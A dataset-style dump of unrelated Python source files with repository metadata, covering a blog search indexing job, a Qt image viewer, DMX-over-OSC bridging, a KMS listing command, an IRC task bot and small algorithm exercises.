raise Exception("Polygon should have postive area")
#To display details about the polygon.
else:
return "Polygon with % s sides and area % s" % (self.numSides, self.area)
try:
#Creating a polygon object with respective number of sides and area.
p1 = Polygon(1,23)
#Printing the object.
print(p1)
#Printing the exception type and respective message.
except Exception as e:
print(type(e))
print(e)
|
[
"email"
] |
email
|
f254f69848a95f326b53f8ce3d6c7f556a3e272f
|
5130754859e274cd06f63260439e5203c2000a11
|
/core/jobs/batch_jobs/blog_post_search_indexing_jobs.py
|
9b9440e7125be3ee12d6e27e9720636aeb7227bd
|
[
"Apache-2.0"
] |
permissive
|
oppia/oppia
|
8ebc9c7c7f2b336e9a79ce04533abe3956f48cbe
|
d16fdf23d790eafd63812bd7239532256e30a21d
|
refs/heads/develop
| 2023-09-04T07:50:13.661276 | 2023-09-03T09:21:32 | 2023-09-03T09:21:32 | 40,687,563 | 6,172 | 4,666 |
Apache-2.0
| 2023-09-14T18:25:11 | 2015-08-14T00:16:14 |
Python
|
UTF-8
|
Python
| false | false | 3,766 |
py
|
# coding: utf-8
#
# Copyright 2022 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Jobs that are run by CRON scheduler."""
from __future__ import annotations
from core.domain import blog_domain
from core.domain import blog_services
from core.domain import search_services
from core.jobs import base_jobs
from core.jobs.io import ndb_io
from core.jobs.transforms import job_result_transforms
from core.jobs.types import job_run_result
from core.platform import models
import apache_beam as beam
import result
from typing import Final, Iterable, List
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import blog_models
from mypy_imports import search_services as platform_search_services
(blog_models,) = models.Registry.import_models([models.Names.BLOG])
platform_search_services = models.Registry.import_search_services()
class IndexBlogPostsInSearchJob(base_jobs.JobBase):
    """Job that indexes the blog posts in Elastic Search."""
    # Upper bound on how many summaries are sent to the search backend in a
    # single indexing call.
    MAX_BATCH_SIZE: Final = 1000
    def run(self) -> beam.PCollection[job_run_result.JobRunResult]:
        """Returns a PCollection of 'SUCCESS' or 'FAILURE' results from
        the Elastic Search.
        Returns:
            PCollection. A PCollection of 'SUCCESS' or 'FAILURE' results from
            the Elastic Search.
        """
        return (
            self.pipeline
            # Read every non-deleted BlogPostSummaryModel from the datastore.
            | 'Get all non-deleted models' >> (
                ndb_io.GetModels(
                    blog_models.BlogPostSummaryModel.get_all(
                        include_deleted=False
                    )
                ))
            | 'Convert BlogPostSummaryModels to domain objects' >> beam.Map(
                blog_services.get_blog_post_summary_from_model)
            # Group into bounded batches so each indexing request stays small.
            | 'Split models into batches' >> beam.transforms.util.BatchElements(
                max_batch_size=self.MAX_BATCH_SIZE)
            | 'Index batches of models' >> beam.ParDo(
                IndexBlogPostSummaries())
            # One JobRunResult per Ok/Err emitted by the DoFn above.
            | 'Count the output' >> (
                job_result_transforms.ResultsToJobRunResults())
        )
# TODO(#15613): Here we use MyPy ignore because the incomplete typing of
# apache_beam library and absences of stubs in Typeshed, forces MyPy to
# assume that PTransform class is of type Any. Thus to avoid MyPy's error
# (Class cannot subclass 'PTransform' (has type 'Any')), we added an
# ignore here.
class IndexBlogPostSummaries(beam.DoFn): # type: ignore[misc]
    """DoFn to index blog post summaries."""
    def process(
        self, blog_post_summaries: List[blog_domain.BlogPostSummary]
    ) -> Iterable[result.Result[None, Exception]]:
        """Index blog post summaries and catch any errors.
        Args:
            blog_post_summaries: list(BlogPostSummaries). List of Blog Post
                Summary domain objects to be indexed.
        Yields:
            JobRunResult. List containing one element, which is either SUCCESS,
            or FAILURE.
        """
        try:
            search_services.index_blog_post_summaries(
                blog_post_summaries)
            # The batch is indexed with one call, but downstream counting
            # expects one result per document, so emit one Ok per summary.
            for _ in blog_post_summaries:
                yield result.Ok()
        except platform_search_services.SearchException as e:
            # A failed batch produces a single Err for the whole batch.
            yield result.Err(e)
|
[
"[email protected]"
] | |
02106294b4d4b980e76f0077bd730aa8cb529c27
|
9c14bb4d3029a9fff23cf0d3e9fdce9ca4e369ab
|
/prettyqt/widgets/composed/imageviewer.py
|
ac1daae24ae902a88755ea0c2d5992f940896d16
|
[
"MIT"
] |
permissive
|
fossabot/PrettyQt
|
0e1ae074ca0776fa02ee0b8e6c04f9d545408855
|
d435b8d8c68d16c704c39972457497c93741859f
|
refs/heads/master
| 2020-05-14T16:50:48.896440 | 2019-04-17T11:48:25 | 2019-04-17T11:48:25 | 181,880,405 | 0 | 0 | null | 2019-04-17T11:48:19 | 2019-04-17T11:48:19 | null |
UTF-8
|
Python
| false | false | 726 |
py
|
# -*- coding: utf-8 -*-
"""
@author: Philipp Temminghoff
"""
import pathlib
import sys
from prettyqt import widgets
class ImageViewer(widgets.Widget):
    """Minimal window that loads 'decisiontree.png' and shows it in a label."""
    def __init__(self, title="", parent=None):
        super().__init__(parent)
        self.title = title
        # Initial window geometry.
        # NOTE(review): assigning self.width / self.height shadows the
        # QWidget width()/height() methods on this instance -- confirm
        # nothing later relies on calling them.
        self.left = 10
        self.top = 10
        self.width = 640
        self.height = 480
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        # Image path is hard-coded and resolved relative to the CWD.
        path = pathlib.Path("decisiontree.png")
        self.image = widgets.Label.image_from_path(path, parent=self)
        self.show()
# Script entry point: create the Qt application, show the viewer, and run
# the event loop until the window closes.
if __name__ == "__main__":
    app = widgets.Application(sys.argv)
    ex = ImageViewer()
    sys.exit(app.exec_())
|
[
"[email protected]"
] | |
c7ce6a26eabd9e0321bd10daacd750f082343174
|
b8d2f095a4b7ea567ccc61ee318ba879318eec3d
|
/树 Tree/538. 把二叉搜索树转换为累加树.py
|
9a2100675571f2350424587e70a2d48bbd0aa325
|
[] |
no_license
|
f1amingo/leetcode-python
|
a3ef78727ae696fe2e94896258cfba1b7d58b1e3
|
b365ba85036e51f7a9e018767914ef22314a6780
|
refs/heads/master
| 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 570 |
py
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from util.ZTree import TreeNode
class Solution:
    def convertBST(self, root: TreeNode) -> TreeNode:
        """Turn a BST into a 'greater tree' in place: each node's value
        becomes the sum of itself and every value greater than it.

        Returns the (mutated) root.
        """
        # A reverse in-order walk (right, node, left) visits keys in
        # descending order, so a running sum holds exactly the new value.
        running = 0
        stack = []
        node = root
        while stack or node:
            while node:
                stack.append(node)
                node = node.right
            node = stack.pop()
            running += node.val
            node.val = running
            node = node.left
        return root
|
[
"[email protected]"
] | |
87f27491103c863122d5b540b57be42f6faccd47
|
5b28005b6ee600e6eeca2fc7c57c346e23da285f
|
/nomadic_recording_lib/comm/dmx/OSCtoOLA.py
|
c5c93f2ac60ce93d0dcc09a1ffe7fb3941cf2212
|
[] |
no_license
|
nocarryr/wowza_logparse
|
c31d2db7ad854c6b0d13495a0ede5f406c2fce3f
|
d6daa5bf58bae1db48ac30031a845bf975c7d5cc
|
refs/heads/master
| 2021-01-17T07:19:00.347206 | 2017-06-24T16:57:32 | 2017-06-24T16:57:32 | 25,835,704 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,980 |
py
|
import socket
import threading
import array
#import jsonpickle
from Bases import OSCBaseObject, Serialization
from ola_IO import olaIO
from ..osc.osc_io import oscIO
from ..BaseIO import detect_usable_address
class OSCtoOLAHost(OSCBaseObject):
    """Bridge between an OSC io node and OLA (Open Lighting Architecture).

    Mirrors OLA DMX universes as OSC-addressable child objects and keeps the
    two transports connected/disconnected together. Python 2 code
    (itervalues/iteritems).
    """
    osc_address = 'OSCtoOLA'
    ui_name = 'OLA (Open Lighting Architecture)'
    # Exposes `connected` as a property backed by the getter/setter below.
    _Properties = {'connected':dict(fget='_connected_getter', fset='_connected_setter')}
    def __init__(self, **kwargs):
        # The OSC io object is supplied by the caller and shared with it.
        self.osc_io = kwargs.get('osc_io')
        # Per-machine client name used for all outgoing OSC messages.
        self.root_address = 'OSCtoOLA-' + socket.gethostname()
        self.direct_mode = False
        # Dead code kept for reference: this object could previously own its
        # osc_io instance when none was supplied.
#        if not self.osc_io:
#            self.direct_mode = True
#            s = 'OSCtoOLA'
#            io_kwargs = dict(confsection=s + '_io', app_address=s, root_address=s)
#            for key in ['hostaddr', 'hostport', 'mcastaddr', 'mcastport']:
#                if key in kwargs:
#                    io_kwargs.update({key:kwargs[key]})
#            self.osc_io = oscIO(**io_kwargs)
#            self.osc_io.add_client_name(socket.gethostname())
        self.osc_parent_node = self.osc_io.root_node
        super(OSCtoOLAHost, self).__init__(**kwargs)
        self.register_signal('state_changed')
        # Maps universe id -> OSCUniverse wrapper.
        self.universes = {}
        self.olaIO = olaIO()
        #self.osc_io.add_client_name(self.root_address, update_conf=False)
        addr = detect_usable_address()
        port = self.osc_io.hostdata['recvport']
        self.osc_io.add_client(name=self.root_address, address=addr, port=port,
                               update_conf=False, isLocalhost=False)
        # Wire up cross-transport notifications.
        self.osc_io.connect('new_master', self.on_osc_new_master)
        self.olaIO.connect('new_universe', self.on_new_ola_universe)
        self.olaIO.connect('state_changed', self.on_ola_state_changed)
        #self.add_osc_handler(callbacks={'request-universes':self.on_universes_requested})
        #self.do_connect()
#    @property
#    def connected(self):
#        return self.olaIO.connected
#    @connected.setter
#    def connected(self, value):
#        self.olaIO.connected = value
    def _connected_getter(self):
        # Connection state is delegated entirely to the OLA io object.
        return self.olaIO.connected
    def _connected_setter(self, value):
        self.olaIO.connected = value
    def do_connect(self):
        # In direct mode this object also owns the OSC connection.
        if self.direct_mode:
            self.osc_io.do_connect()
        self.olaIO.do_connect()
    def do_disconnect(self):
        def _do_disconnect():
            if self.direct_mode:
                self.osc_io.do_disconnect()
            self.olaIO.do_disconnect()
        # Black out all universes first, then disconnect half a second later
        # so the zeroed values have a chance to be sent out.
        for univ in self.universes.itervalues():
            univ.set_all_zero(True)
        t = threading.Timer(.5, _do_disconnect)
        t.daemon = True
        t.start()
    def on_ola_state_changed(self, **kwargs):
        # Re-emit OLA state changes under this object's own signal.
        self.emit('state_changed', **kwargs)
    def on_new_ola_universe(self, **kwargs):
        # Wrap each newly announced OLA universe exactly once.
        univ = kwargs.get('ola_universe')
        if univ.id not in self.universes:
            u_kwargs = self.add_osc_child(address=str(univ.id))
            u_kwargs.update({'ola_universe':univ, 'root_address':self.root_address})
            obj = OSCUniverse(**u_kwargs)
            self.universes.update({obj.id:obj})
    def on_universes_requested(self, **kwargs):
        # Reply with a JSON summary ({id: {id, name}}) of known universes.
        d = {}
        for key, val in self.universes.iteritems():
            d.update({key:{}})
            for attr in ['id', 'name']:
                d[key].update({attr:getattr(val, attr)})
        s = Serialization.to_json(d)
        self.osc_node.send_message(root_address=self.root_address, address='universes-info', value=s)
    def on_osc_new_master(self, **kwargs):
        # Only the OSC master outputs real values; everyone else blacks out.
        for univ in self.universes.itervalues():
            univ.set_all_zero(not self.osc_node.oscMaster)
    def on_app_exit(self, *args, **kwargs):
        self.LOG.info('oscola app exit')
        self.olaIO.on_app_exit()
class OSCUniverse(OSCBaseObject):
    """One DMX universe exposed over OSC; holds the channel value buffer.

    NOTE(review): the buffer has 513 slots; on_universe_set_channel writes
    index chan-1 while on_universe_dump_response writes index i directly --
    confirm which indexing base the remote side uses.
    """
    def __init__(self, **kwargs):
        self._values = None
        # While True, `values` reads back as all zeros (blackout) without
        # losing the real buffer contents.
        self.all_zero = False
        super(OSCUniverse, self).__init__(**kwargs)
        self.register_signal('value_update')
        self.values = array.array('B', [0]*513)
        #print 'osc path: ', self.osc_node.get_full_path()
        self.root_address = kwargs.get('root_address')
        self.ola_universe = kwargs.get('ola_universe')
        # Link back so the OLA side can push into this wrapper.
        self.ola_universe.Universe = self
        #self.id = self.ola_universe.id
        self.add_osc_handler(callbacks={'set-channel':self.on_universe_set_channel,
                                        'dump-response':self.on_universe_dump_response})
        # Ask the remote side for a full snapshot of current channel values.
        self.osc_node.send_message(root_address=self.root_address, client=self.root_address, address='request-dump')
        #print 'OSCtoOLA new_universe: uid=%s, name=%s, pyid=%s' % (self.id, self.name, id(self))
    @property
    def id(self):
        # Identity is delegated to the wrapped OLA universe.
        return self.ola_universe.id
    @property
    def name(self):
        return self.ola_universe.name
    @property
    def values(self):
        # Report silence while blacked out; the real buffer stays intact.
        if self.all_zero:
            return array.array('B', [0]*513)
        return self._values
    @values.setter
    def values(self, values):
        self._values = values
    def on_universe_set_channel(self, **kwargs):
        # `values` carries a (channel, value) pair from OSC.
        # NOTE(review): while all_zero is True the getter returns a fresh
        # array, so this write is silently discarded -- confirm intended.
        values = kwargs.get('values')
        chan = values[0]
        value = values[1]
        self.values[chan-1] = value
        #print 'oscola univ update: ', chan, value
        #print 'update from osc: chan=%s, value=%s' % (chan, value)
        if not self.all_zero:
            self.emit('value_update', universe=self, values=self.values)
    def on_universe_dump_response(self, **kwargs):
        # Full snapshot: overwrite the buffer element by element.
        values = kwargs.get('values')
        for i, value in enumerate(values):
            self.values[i] = value
        self.emit('value_update', universe=self, values=self.values)
    def set_all_zero(self, state):
        # Toggle blackout and notify listeners with the effective values.
        self.all_zero = state
        self.emit('value_update', universe=self, values=self.values)
|
[
"[email protected]"
] | |
7880bcad5a3a3c0cfe1efef41f3c6bcba6189d35
|
49a0010d8c6c3dc4c92a5795ddee418de976ada4
|
/CH03/0311.py
|
e40cc572a518f4ea487a43c2a36bcac7623a0484
|
[] |
no_license
|
mytree/Test_PythonCV
|
4c20ee4f073558488d2bf947fca500f677f36d13
|
9ba1e0bc8e7d84f1f7df3ca051a3d7e70e1745bb
|
refs/heads/master
| 2020-09-13T06:20:04.743092 | 2019-11-19T11:37:40 | 2019-11-19T11:37:40 | 222,679,573 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 865 |
py
|
#0311.py
import cv2
import numpy as np
def onMouse(event, x, y, flags, param):
    """Mouse callback: draw on the shared image passed as param[0].

    Left click draws a circle in BGR (255,0,0) (a rectangle when Shift is
    held), right click draws a circle in (0,0,255), and a left double-click
    resets the canvas to white.
    """
##  global img  (not needed: the image is shared via the mutable param list)
    if event == cv2.EVENT_LBUTTONDOWN: # left mouse button pressed
        if flags & cv2.EVENT_FLAG_SHIFTKEY: # together with the Shift key
            cv2.rectangle(param[0], (x-5,y-5),(x+5,y+5),(255,0,0))
        else:
            cv2.circle(param[0], (x,y), 5, (255,0,0), 3)
    elif event == cv2.EVENT_RBUTTONDOWN: # right mouse button pressed
        cv2.circle(param[0], (x,y), 5, (0,0,255), 3)
    elif event == cv2.EVENT_LBUTTONDBLCLK: # left mouse button double-clicked
        # Rebind param[0] so the caller's list sees the fresh white canvas.
        param[0] = np.zeros(param[0].shape, np.uint8) + 255
    cv2.imshow("img", param[0])
# Create a 512x512 white canvas and route mouse events on the "img" window
# to onMouse; the one-element list lets the callback replace the image.
img = np.zeros((512,512,3),np.uint8)+255
cv2.imshow('img',img)
cv2.setMouseCallback('img', onMouse, [img])
cv2.waitKey()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
90d59540d8e2afccaf99b13f80cc0a735d81e0a3
|
85a7dde9c48945972a7f521f0fbb2eb56b323aa2
|
/obsolete_files/old/listening_eyes.py
|
69a61d1a1a20e04408df1df5513166b7f89f27b3
|
[] |
no_license
|
jwmcgettigan/renegade
|
1e8f61a14d6a5a7aff5c410f0c26bb166f95bd03
|
ef76bebc6867683e1fb3201be547f42aa6e65881
|
refs/heads/master
| 2021-04-06T13:53:12.945602 | 2018-07-17T22:09:13 | 2018-07-17T22:09:13 | 124,680,527 | 1 | 0 | null | 2018-07-17T22:09:14 | 2018-03-10T17:33:52 |
Makefile
|
UTF-8
|
Python
| false | false | 752 |
py
|
#!/usr/bin/env python
import rospy as rp
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
# Shared converter between ROS image messages and OpenCV arrays.
bridge = CvBridge()
def left_callback(data):
    """Display frames arriving on the left eye topic."""
    cv2.imshow("left_eye", bridge.imgmsg_to_cv2(data, desired_encoding="passthrough"))
    # waitKey lets the HighGUI window refresh; the 'q' branch is a no-op.
    if cv2.waitKey(20) & 0xFF == ord('q'):
        pass
def right_callback(data):
    """Display frames arriving on the right eye topic."""
    cv2.imshow("right_eye", bridge.imgmsg_to_cv2(data, desired_encoding="passthrough"))
    if cv2.waitKey(20) & 0xFF == ord('q'):
        pass
def listener():
    """Subscribe to both eye image topics and block until ROS shutdown."""
    rp.init_node('listener', anonymous=True)
    rp.Subscriber("left_eye", Image, left_callback)
    rp.Subscriber("right_eye", Image, right_callback)
    rp.spin()
if __name__ == '__main__':
    listener()
    cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
1816c72bb11d3ba9ad7302ebd635296b73376925
|
3235145c84c48535bbf27dabfb3faa7359ed6fef
|
/google-cloud-sdk/lib/surface/kms/keyrings/list.py
|
bf8cafeeb0701a5774aa513b68e90225b592a8f0
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
paceuniversity/CS3892017team1
|
b69fb10f5194f09748cd5bca48901e9bd87a55dc
|
f8e82537c84cac148f577794d2299ea671b26bc2
|
refs/heads/master
| 2021-01-17T04:34:04.158071 | 2017-05-09T04:10:22 | 2017-05-09T04:10:22 | 82,976,622 | 2 | 8 | null | 2020-07-25T09:45:47 | 2017-02-23T22:13:04 |
Python
|
UTF-8
|
Python
| false | false | 1,842 |
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""List keyrings within a location."""
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.cloudkms import base as cloudkms_base
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.kms import flags
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
class List(base.ListCommand):
    """List keyrings within a location.
    Lists all keyrings within the given location.
    ## EXAMPLES
    The following command lists a maximum of five keyrings in the location
    `global`:
    $ {command} --location global --limit=5
    """
    @staticmethod
    def Args(parser):
        # Show only the keyring resource name column in the output table.
        parser.display_info.AddFormat('table(name)')
    def Run(self, args):
        client = cloudkms_base.GetClientInstance()
        messages = cloudkms_base.GetMessagesModule()
        # Resolve the parent location from --location plus the core project.
        location_ref = resources.REGISTRY.Create(
            flags.LOCATION_COLLECTION,
            projectsId=properties.VALUES.core.project.GetOrFail)
        request = messages.CloudkmsProjectsLocationsKeyRingsListRequest(
            parent=location_ref.RelativeName())
        # Page through the API results transparently, honoring --limit.
        return list_pager.YieldFromList(
            client.projects_locations_keyRings,
            request,
            field='keyRings',
            limit=args.limit,
            batch_size_attribute='pageSize')
|
[
"[email protected]"
] | |
91a697244a8376cdea2aa5aa40233538c0976c78
|
66013dd1c4b051d1934a82f6c903f4088e9db3d0
|
/2주차/2021.01.26/예제/differentiation.py
|
ed0d5c04867a8c4231bd263838638e8709580c8b
|
[] |
no_license
|
dlrgy22/Boostcamp
|
690656d5b0e35d88a9b1480b36b42ffba47b3bc5
|
af6fb8ce02cc92d1d0227a972d187ccc294af0e9
|
refs/heads/main
| 2023-04-18T04:06:18.419625 | 2021-05-07T01:24:47 | 2021-05-07T01:24:47 | 330,589,750 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
import sympy as sym
from sympy.abc import x, y
# d/dx (x^2 + 2x + 3) = 2x + 2
func = sym.diff(sym.poly(x**2 + 2*x + 3), x)
print(func)
# Evaluate the derivative at x = 2.
print(func.subs(x, 2))
# Partial derivatives of x^2 + 2xy + 3 + cos(x + 2y) w.r.t. x, then y.
print(sym.diff(sym.poly(x**2 + 2*x*y + 3) + sym.cos(x + 2*y), x))
print(sym.diff(sym.poly(x**2 + 2*x*y + 3) + sym.cos(x + 2*y), y))
|
[
"[email protected]"
] | |
539846eac1b2f133d9cd8effb4190a5c233a6adb
|
1a5d7882b9e89b821851be328256211c65f9c1a2
|
/simple_settings/strategies/__init__.py
|
7d95f88acb1141987187d45f54d012d3e2e30de8
|
[
"MIT"
] |
permissive
|
matthewh/simple-settings
|
2644f3032e5fc7ffa50dc8fa164bf79f640e5641
|
dbddf8d5be7096ee7c4c3cc6d82824befa9b714f
|
refs/heads/master
| 2022-11-04T22:25:55.398073 | 2020-06-22T19:25:03 | 2020-06-22T19:25:03 | 274,223,776 | 0 | 0 |
MIT
| 2020-06-22T19:21:30 | 2020-06-22T19:21:29 | null |
UTF-8
|
Python
| false | false | 805 |
py
|
# -*- coding: utf-8 -*-
from .cfg import SettingsLoadStrategyCfg
from .environ import SettingsLoadStrategyEnviron
from .json_file import SettingsLoadStrategyJson
from .python import SettingsLoadStrategyPython
# YAML and TOML support are optional: their strategies are appended only
# when the parser dependencies are importable.
yaml_strategy = None
try:
    from .yaml_file import SettingsLoadStrategyYaml
    yaml_strategy = SettingsLoadStrategyYaml
except ImportError:  # pragma: no cover
    pass
toml_strategy = None
try:
    from .toml_file import SettingsLoadStrategyToml
    toml_strategy = SettingsLoadStrategyToml
except ImportError:  # pragma: no cover
    pass
# NOTE(review): consumers appear to probe these strategies in tuple order --
# confirm before reordering.
strategies = (
    SettingsLoadStrategyPython,
    SettingsLoadStrategyCfg,
    SettingsLoadStrategyJson,
    SettingsLoadStrategyEnviron
)
if yaml_strategy:
    strategies += (yaml_strategy,)
if toml_strategy:
    strategies += (toml_strategy,)
|
[
"[email protected]"
] | |
ed2954bdd2ec5424da580a3dbdf86056e9c9e612
|
dd1e2ed53fec3dca0fa60042c04ad8cf6019ed89
|
/python/functions/arguments_passed_as_dictionary/arguments_passed_as_dictionary.py
|
bd77e7ed569887e6547b03ab831fdd645d5f53b0
|
[] |
no_license
|
cloudavail/snippets
|
9be4ee285789ff3cff1a3a71e1f505a1b1697500
|
340f5c2735d6ec88b793f1eea91f2b026c24586e
|
refs/heads/main
| 2023-08-03T10:30:13.976947 | 2023-05-15T04:46:32 | 2023-05-15T04:46:32 | 12,838,293 | 22 | 24 | null | 2023-09-07T03:33:17 | 2013-09-15T00:40:49 |
JavaScript
|
UTF-8
|
Python
| false | false | 668 |
py
|
#!/usr/bin/env python
# objective: pass arguments as dictionary
# creates the function "argument_catcher" and accepts the following keywords
# Python 2 code (print statements).
def argument_catcher(city, population, size, state):
    # Prints one line per field; called below with keywords unpacked from
    # a dictionary via **.
    print 'city: {!s}'.format(city)
    print 'state: {!s}'.format(state)
    print 'population: {!s}'.format(population)
    print 'size: {!s} miles'.format(size)
# creates the dictionary to be passed to the "argument_catcher" function
arguments_dict = {'city': 'San Francisco', 'population': 800000, 'size': 49,
                  'state': 'California'}
# calls the function "argument_catcher" with the previously created dictionary;
# ** unpacks each dict key as a keyword argument
argument_catcher(**arguments_dict)
|
[
"[email protected]"
] | |
39c3141c70b4a3fe7f93408a9993d754ec1d4bd5
|
e2c6f262bb4ea12e3adb4534b3d7e3451c416dc4
|
/slarson/pywikipedia/maintcont.py
|
b55f806b04bc8e108737425fb4b8a8401c72cf48
|
[
"MIT",
"Python-2.0",
"LicenseRef-scancode-mit-old-style"
] |
permissive
|
slarson/ncmir-semantic-sandbox
|
c48e8c9dd5a6f5769d4422c80ca58c370786bfab
|
d6a02a5cf4415796f25d191d541ebaccaab53e7f
|
refs/heads/master
| 2016-09-06T04:10:21.136714 | 2009-03-31T09:49:59 | 2009-03-31T09:49:59 | 32,129,001 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,925 |
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
The controller bot for maintainer.py
Exactly one instance should be running of it. To check, use /whois maintcont on irc.freenode.net
This script requires the Python IRC library http://python-irclib.sourceforge.net/
Warning: experimental software, use at your own risk
"""
__version__ = '$Id$'
# Author: Balasyum
# http://hu.wikipedia.org/wiki/User:Balasyum
from ircbot import SingleServerIRCBot
from irclib import nm_to_n
import threading
import time
import math
tasks = 'rciw|censure'
projtasks = {}
mainters = []
activity = {}
class MaintcontBot(SingleServerIRCBot):
    """IRC bot that registers maintainer.py workers and shares tasks among
    them. Python 2 code (print statements, has_key)."""
    def __init__(self, nickname, server, port=6667):
        SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
    def on_nicknameinuse(self, c, e):
        # Append underscores until a free nickname is found.
        c.nick(c.get_nickname() + "_")
    def on_welcome(self, c, e):
        # Start the background watchdog that prunes inactive workers.
        t = threading.Thread(target=self.lister)
        t.setDaemon(True)
        t.start()
    def on_privmsg(self, c, e):
        """Handle 'workerjoin <group>' registrations and 'active' keepalives."""
        nick = nm_to_n(e.source())
        c = self.connection
        cmd = e.arguments()[0]
        do = cmd.split()
        if do[0] == "workerjoin":
            c.privmsg(nick, "accepted")
            mainters.append([nick, do[1]])
            activity[nick] = time.time()
            print "worker got, name:", nick, "job:", do[1]
            # Redistribute the group's tasks to include the new worker.
            self.retasker(do[1])
        elif do[0] == "active":
            # Heartbeat: refresh the worker's last-seen timestamp.
            activity[nick] = time.time()
    def on_dccmsg(self, c, e):
        pass
    def on_dccchat(self, c, e):
        pass
    def lister(self):
        """Watchdog loop: every minute, drop workers silent for more than
        30 seconds and redistribute their group's tasks."""
        while True:
            print
            print "worker list:"
            for mainter in mainters:
                if time.time() - activity[mainter[0]] > 30:
                    print "*", mainter[0], "has been removed"
                    # NOTE(review): removing from `mainters` while iterating
                    # it can skip the following entry -- confirm, or iterate
                    # over a copy.
                    mainters.remove(mainter)
                    del activity[mainter[0]]
                    self.retasker(mainter[1])
                    continue
                print "mainter name:", mainter[0], "job:", mainter[1]
            print "--------------------"
            print
            time.sleep(1*60)
    def retasker(self, group, optask = ''):
        """Split the group's '|'-separated task list evenly across its
        currently registered workers."""
        ingroup = 0
        for mainter in mainters:
            if mainter[1] == group:
                ingroup += 1
        if ingroup == 0:
            return
        # Per-project task override, else the global default list.
        if projtasks.has_key(group):
            grt = projtasks[group]
        else:
            grt = tasks
        tpc = grt.split('|')
        tpcn = round(len(tpc) / ingroup)
        i = 0
        for mainter in mainters:
            if mainter[1] != group:
                continue
            # Send this worker its contiguous slice of the task list.
            tts = '|'.join(tpc[int(round(i * tpcn)):int(round((i + 1) * tpcn))])
            if tts != False:
                self.connection.privmsg(mainter[0], "tasklist " + tts)
            i += 1
def main():
    # Connect the controller bot to freenode and run its event loop forever.
    bot = MaintcontBot("maintcont", "irc.freenode.net")
    bot.start()
if __name__ == "__main__":
    main()
|
[
"stephen.larson@933566eb-c141-0410-b91b-f3a7fcfc7766"
] |
stephen.larson@933566eb-c141-0410-b91b-f3a7fcfc7766
|
ec282d154faabb3d27915f38c3c13d823ae008c8
|
39de3097fb024c67a00c8d0e57c937d91f8b2cc9
|
/Graphs/first_depth_first_search.py
|
d08ac89c8316ae345b61554a0dbaf65cbb800397
|
[] |
no_license
|
srajsonu/InterviewBit-Solution-Python
|
4f41da54c18b47db19c3c0ad0e5efa165bfd0cd0
|
6099a7b02ad0d71e08f936b7ac35fe035738c26f
|
refs/heads/master
| 2023-03-07T05:49:15.597928 | 2021-02-24T18:20:07 | 2021-02-24T18:20:07 | 249,359,666 | 0 | 2 | null | 2020-10-06T10:54:07 | 2020-03-23T07:09:53 |
Python
|
UTF-8
|
Python
| false | false | 558 |
py
|
from _collections import defaultdict
class Solution:
    """Reachability check on a graph where node A[i] has an edge to node
    i+1 (nodes are 1-indexed).

    Note: despite the file name, the traversal is breadth-first (a queue).
    """
    def __init__(self):
        # Adjacency list: node value -> list of 1-indexed child nodes.
        self.graph = defaultdict(list)
    def Solve(self, A, B, C):
        """Return 1 if node B is reachable from node C, else 0.

        A: list where A[i] is the parent of node i+1.
        B: target node (1-indexed).
        C: start node (1-indexed).
        """
        # deque gives O(1) popleft; list.pop(0) shifts the whole list and
        # made the original BFS O(n^2) in the worst case.
        from collections import deque
        n = len(A)
        for i, parent in enumerate(A):
            self.graph[parent].append(i + 1)
        visited = [0] * (n + 1)
        queue = deque([C])
        visited[C] = 1
        while queue:
            node = queue.popleft()
            for child in self.graph[node]:
                if not visited[child]:
                    visited[child] = 1
                    queue.append(child)
        return visited[B]
# Sample run: edges A[i] -> i+1; is node 9 reachable from node 1?
A=[1,1,1,3,3,2,2,7,6]
B=9
C=1
D=Solution()
print(D.Solve(A,B,C))
|
[
"[email protected]"
] | |
75cc35602ae659ea024b658db136fe838acb3ec8
|
dae4ab4882080344e5f505def7e2e59e0ed888b4
|
/polyaxon/libs/unique_urls.py
|
9a1268f47539af0e3fffc4d92358250465c22ab1
|
[
"MPL-2.0"
] |
permissive
|
vfdev-5/polyaxon
|
8c3945604e8eaa25ba8b3a39ed0838d0b9f39a28
|
3e1511a993dc1a03e0a0827de0357f4adcc0015f
|
refs/heads/master
| 2021-07-09T22:27:23.272591 | 2018-11-01T23:44:44 | 2018-11-01T23:44:44 | 154,320,634 | 0 | 0 |
MIT
| 2018-10-23T12:01:34 | 2018-10-23T12:01:33 | null |
UTF-8
|
Python
| false | false | 1,467 |
py
|
def get_user_url(username):
    """Return the URL path of a user's profile page."""
    return '/{0}'.format(username)
